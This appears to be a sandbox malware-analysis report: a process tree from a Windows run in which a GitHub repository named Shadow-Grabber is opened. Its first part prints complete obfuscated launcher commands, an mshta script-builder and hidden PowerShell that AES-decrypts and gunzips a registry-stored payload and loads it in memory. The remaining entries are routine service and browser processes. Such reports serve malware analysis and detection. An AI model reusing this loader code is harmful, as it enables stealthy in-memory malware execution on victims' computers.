C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{5864ce94-f02e-4fec-97a5-4ee963750108}5⤵
-
C:\Windows\$sxr-mshta.exeC:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-tjptoUybjVuvgCOJtIWn4312:&#<?=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"2⤵
-
C:\Windows\$sxr-cmd.exe"C:\Windows\$sxr-cmd.exe" /c %$sxr-tjptoUybjVuvgCOJtIWn4312:&#<?=%3⤵
-
C:\Windows\$sxr-powershell.exeC:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function VOHZF($Lwtxx){ $xCaUG=[System.Security.Cryptography.Aes]::Create(); $xCaUG.Mode=[System.Security.Cryptography.CipherMode]::CBC; $xCaUG.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $xCaUG.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0='); $xCaUG.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg=='); $CTnvz=$xCaUG.('rotpyrceDetaerC'[-1..-15] -join '')(); $oMfGF=$CTnvz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Lwtxx, 0, $Lwtxx.Length); $CTnvz.Dispose(); $xCaUG.Dispose(); $oMfGF;}function nnKof($Lwtxx){ $ABMbT=New-Object System.IO.MemoryStream(,$Lwtxx); $FswzF=New-Object System.IO.MemoryStream; $ZWQus=New-Object System.IO.Compression.GZipStream($ABMbT, [IO.Compression.CompressionMode]::Decompress); $ZWQus.CopyTo($FswzF); $ZWQus.Dispose(); $ABMbT.Dispose(); $FswzF.Dispose(); $FswzF.ToArray();}function vzvJZ($Lwtxx,$kAWoQ){ $kXIpu=[System.Reflection.Assembly]::Load([byte[]]$Lwtxx); $OPPDg=$kXIpu.EntryPoint; $OPPDg.Invoke($null, $kAWoQ);}$xCaUG1 = New-Object System.Security.Cryptography.AesManaged;$xCaUG1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$xCaUG1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$xCaUG1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0=');$xCaUG1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg==');$qsFQP = $xCaUG1.('rotpyrceDetaerC'[-1..-15] -join '')();$UMIrZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2twxIFMV1JWyz0b8BpHEfA==');$UMIrZ = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ, 0, $UMIrZ.Length);$UMIrZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ);$PYyQA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('p05ztWCKuMfos2Q8RYoS+FIXy2DypHHbyYGL6Z+cEc8=');$PYyQA = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($PYyQA, 0, $PYyQA.Length);$PYyQA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($PYyQA);$roofG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Sy8HcJTfKA/mf4hPH+Go6g==');$roofG = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($roofG, 0, $roofG.Length);$roofG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($roofG);$tgmGC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BuxXfqRY1RoP0b/ROY4PrLV7XH6EyWkqL6UOT7VtjFZgNba4DmwvRZ0rEKh6tsW5E4dar7n8yKYorGfhmfzDSchZoElrP0gmf7pENQ75eXbqF+3j4N1LjY1xzYPYeJFwvJGbJvqe3CPoWhNQATtYtY/6ujGYTqqhsjIgqQdcVJyCExpvLG1KTAiDHwbcLEgHzlPLvK+nTj2PYL6WYsFa3I8rptDz3r9IvJABT8A6TOqZRS2q9nM/2K1/IRFUTDKvPPtYy9cd0jq4MTO7gDnvlUAC8kJM0rAwSo8RwA3zKJNYBBv03aq6fIf9zugDa03cb0yO24aIfe5AFN+zOGDLKtWrsyyIVpjarzDCbBlxkhPRynAyHBM2A5pmzVa2gAc2+o8odD180Z07f5ZL3mYwTO8G4arHTtORWkqMdtdm7CA=');$tgmGC = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tgmGC, 0, $tgmGC.Length);$tgmGC = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tgmGC);$zvkCv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JVVxi793TWK0eiazbMjyxQ==');$zvkCv = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($zvkCv, 0, $zvkCv.Length);$zvkCv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($zvkCv);$MrvyW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('y9CiMcnIF08D1mbStDfFzg==');$MrvyW = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($MrvyW, 0, $MrvyW.Length);$MrvyW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($MrvyW);$UFhRe = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4Gkz3kktZWs5v4iY/fwpuA==');$UFhRe = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UFhRe, 0, $UFhRe.Length);$UFhRe = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UFhRe);$BdNHQ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mWujaRBJ7Bka6/SLPc2zjg==');$BdNHQ = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BdNHQ, 0, $BdNHQ.Length);$BdNHQ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BdNHQ);$NXCWg = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JS1eCTl+J3Vy2lPum4BV+A==');$NXCWg = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NXCWg, 0, $NXCWg.Length);$NXCWg = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NXCWg);$UMIrZ0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Xun+s5YVAeQzgGPJKptAJw==');$UMIrZ0 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ0, 0, $UMIrZ0.Length);$UMIrZ0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ0);$UMIrZ1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tKxTd8rUmwwPDWYqtJ+flg==');$UMIrZ1 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ1, 0, $UMIrZ1.Length);$UMIrZ1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ1);$UMIrZ2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QwPWmxWc7oP0xMzohMzOyA==');$UMIrZ2 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ2, 0, $UMIrZ2.Length);$UMIrZ2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ2);$UMIrZ3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('00EoyZz50MzeF+YVDb5OyQ==');$UMIrZ3 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ3, 0, $UMIrZ3.Length);$UMIrZ3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ3);$qsFQP.Dispose();$xCaUG1.Dispose();if (@(get-process -ea silentlycontinue $UMIrZ3).count -gt 1) {exit};$dINWW = [Microsoft.Win32.Registry]::$BdNHQ.$UFhRe($UMIrZ).$MrvyW($PYyQA);$QJXfU=[string[]]$dINWW.Split('\');$flTmo=nnKof(VOHZF([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($QJXfU[1])));vzvJZ $flTmo (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$iBTnS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($QJXfU[0]);$xCaUG = New-Object System.Security.Cryptography.AesManaged;$xCaUG.Mode = [System.Security.Cryptography.CipherMode]::CBC;$xCaUG.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$xCaUG.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0=');$xCaUG.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg==');$CTnvz = $xCaUG.('rotpyrceDetaerC'[-1..-15] -join '')();$iBTnS = $CTnvz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($iBTnS, 0, $iBTnS.Length);$CTnvz.Dispose();$xCaUG.Dispose();$ABMbT = New-Object System.IO.MemoryStream(, $iBTnS);$FswzF = New-Object System.IO.MemoryStream;$ZWQus = New-Object System.IO.Compression.GZipStream($ABMbT, [IO.Compression.CompressionMode]::$UMIrZ1);$ZWQus.$NXCWg($FswzF);$ZWQus.Dispose();$ABMbT.Dispose();$FswzF.Dispose();$iBTnS = $FswzF.ToArray();$JJwWP = $tgmGC | IEX;$kXIpu = $JJwWP::$UMIrZ2($iBTnS);$OPPDg = $kXIpu.EntryPoint;$OPPDg.$UMIrZ0($null, (, [string[]] ($roofG)))4⤵
- Hide Artifacts: Hidden Window
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{4c331552-2ca5-40d5-823f-ac583a42d04b}5⤵
-
C:\Windows\$sxr-powershell.exe"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(5684).WaitForExit();[System.Threading.Thread]::Sleep(5000); function VOHZF($Lwtxx){ $xCaUG=[System.Security.Cryptography.Aes]::Create(); $xCaUG.Mode=[System.Security.Cryptography.CipherMode]::CBC; $xCaUG.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $xCaUG.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0='); $xCaUG.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg=='); $CTnvz=$xCaUG.('rotpyrceDetaerC'[-1..-15] -join '')(); $oMfGF=$CTnvz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Lwtxx, 0, $Lwtxx.Length); $CTnvz.Dispose(); $xCaUG.Dispose(); $oMfGF;}function nnKof($Lwtxx){ $ABMbT=New-Object System.IO.MemoryStream(,$Lwtxx); $FswzF=New-Object System.IO.MemoryStream; $ZWQus=New-Object System.IO.Compression.GZipStream($ABMbT, [IO.Compression.CompressionMode]::Decompress); $ZWQus.CopyTo($FswzF); $ZWQus.Dispose(); $ABMbT.Dispose(); $FswzF.Dispose(); $FswzF.ToArray();}function vzvJZ($Lwtxx,$kAWoQ){ $kXIpu=[System.Reflection.Assembly]::Load([byte[]]$Lwtxx); $OPPDg=$kXIpu.EntryPoint; $OPPDg.Invoke($null, $kAWoQ);}$xCaUG1 = New-Object System.Security.Cryptography.AesManaged;$xCaUG1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$xCaUG1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$xCaUG1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0=');$xCaUG1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg==');$qsFQP = $xCaUG1.('rotpyrceDetaerC'[-1..-15] -join '')();$UMIrZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2twxIFMV1JWyz0b8BpHEfA==');$UMIrZ = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ, 0, $UMIrZ.Length);$UMIrZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ);$PYyQA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('p05ztWCKuMfos2Q8RYoS+FIXy2DypHHbyYGL6Z+cEc8=');$PYyQA = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($PYyQA, 0, $PYyQA.Length);$PYyQA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($PYyQA);$roofG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Sy8HcJTfKA/mf4hPH+Go6g==');$roofG = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($roofG, 0, $roofG.Length);$roofG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($roofG);$tgmGC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BuxXfqRY1RoP0b/ROY4PrLV7XH6EyWkqL6UOT7VtjFZgNba4DmwvRZ0rEKh6tsW5E4dar7n8yKYorGfhmfzDSchZoElrP0gmf7pENQ75eXbqF+3j4N1LjY1xzYPYeJFwvJGbJvqe3CPoWhNQATtYtY/6ujGYTqqhsjIgqQdcVJyCExpvLG1KTAiDHwbcLEgHzlPLvK+nTj2PYL6WYsFa3I8rptDz3r9IvJABT8A6TOqZRS2q9nM/2K1/IRFUTDKvPPtYy9cd0jq4MTO7gDnvlUAC8kJM0rAwSo8RwA3zKJNYBBv03aq6fIf9zugDa03cb0yO24aIfe5AFN+zOGDLKtWrsyyIVpjarzDCbBlxkhPRynAyHBM2A5pmzVa2gAc2+o8odD180Z07f5ZL3mYwTO8G4arHTtORWkqMdtdm7CA=');$tgmGC = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tgmGC, 0, $tgmGC.Length);$tgmGC = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tgmGC);$zvkCv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JVVxi793TWK0eiazbMjyxQ==');$zvkCv = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($zvkCv, 0, $zvkCv.Length);$zvkCv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($zvkCv);$MrvyW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('y9CiMcnIF08D1mbStDfFzg==');$MrvyW = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($MrvyW, 0, $MrvyW.Length);$MrvyW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($MrvyW);$UFhRe = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4Gkz3kktZWs5v4iY/fwpuA==');$UFhRe = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UFhRe, 0, $UFhRe.Length);$UFhRe = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UFhRe);$BdNHQ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mWujaRBJ7Bka6/SLPc2zjg==');$BdNHQ = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BdNHQ, 0, $BdNHQ.Length);$BdNHQ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BdNHQ);$NXCWg = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JS1eCTl+J3Vy2lPum4BV+A==');$NXCWg = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NXCWg, 0, $NXCWg.Length);$NXCWg = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NXCWg);$UMIrZ0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Xun+s5YVAeQzgGPJKptAJw==');$UMIrZ0 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ0, 0, $UMIrZ0.Length);$UMIrZ0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ0);$UMIrZ1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tKxTd8rUmwwPDWYqtJ+flg==');$UMIrZ1 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ1, 0, $UMIrZ1.Length);$UMIrZ1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ1);$UMIrZ2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QwPWmxWc7oP0xMzohMzOyA==');$UMIrZ2 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ2, 0, $UMIrZ2.Length);$UMIrZ2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ2);$UMIrZ3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('00EoyZz50MzeF+YVDb5OyQ==');$UMIrZ3 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ3, 0, $UMIrZ3.Length);$UMIrZ3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ3);$qsFQP.Dispose();$xCaUG1.Dispose();if (@(get-process -ea silentlycontinue $UMIrZ3).count -gt 1) {exit};$dINWW = [Microsoft.Win32.Registry]::$BdNHQ.$UFhRe($UMIrZ).$MrvyW($PYyQA);$QJXfU=[string[]]$dINWW.Split('\');$flTmo=nnKof(VOHZF([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($QJXfU[1])));vzvJZ $flTmo (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$iBTnS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($QJXfU[0]);$xCaUG = New-Object System.Security.Cryptography.AesManaged;$xCaUG.Mode = [System.Security.Cryptography.CipherMode]::CBC;$xCaUG.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$xCaUG.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0=');$xCaUG.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg==');$CTnvz = $xCaUG.('rotpyrceDetaerC'[-1..-15] -join '')();$iBTnS = $CTnvz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($iBTnS, 0, $iBTnS.Length);$CTnvz.Dispose();$xCaUG.Dispose();$ABMbT = New-Object System.IO.MemoryStream(, $iBTnS);$FswzF = New-Object System.IO.MemoryStream;$ZWQus = New-Object System.IO.Compression.GZipStream($ABMbT, [IO.Compression.CompressionMode]::$UMIrZ1);$ZWQus.$NXCWg($FswzF);$ZWQus.Dispose();$ABMbT.Dispose();$FswzF.Dispose();$iBTnS = $FswzF.ToArray();$JJwWP = $tgmGC | IEX;$kXIpu = $JJwWP::$UMIrZ2($iBTnS);$OPPDg = $kXIpu.EntryPoint;$OPPDg.$UMIrZ0($null, (, [string[]] ($roofG)))5⤵
- Hide Artifacts: Hidden Window
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{68cf8a46-b33f-4fe2-ba56-6c3aa35b7ce0}5⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netprofm -p -s netprofm1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵
-
C:\Windows\system32\sihost.exesihost.exe2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of UnmapMainImage
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/Excalisz/Shadow-Grabber-2⤵
- Enumerates system info in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffb6ecd3cb8,0x7ffb6ecd3cc8,0x7ffb6ecd3cd83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1876,12252140788525508075,13929273325574559245,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1904 /prefetch:23⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1876,12252140788525508075,13929273325574559245,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2336 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1876,12252140788525508075,13929273325574559245,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2772 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,12252140788525508075,13929273325574559245,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,12252140788525508075,13929273325574559245,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1876,12252140788525508075,13929273325574559245,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5516 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
-
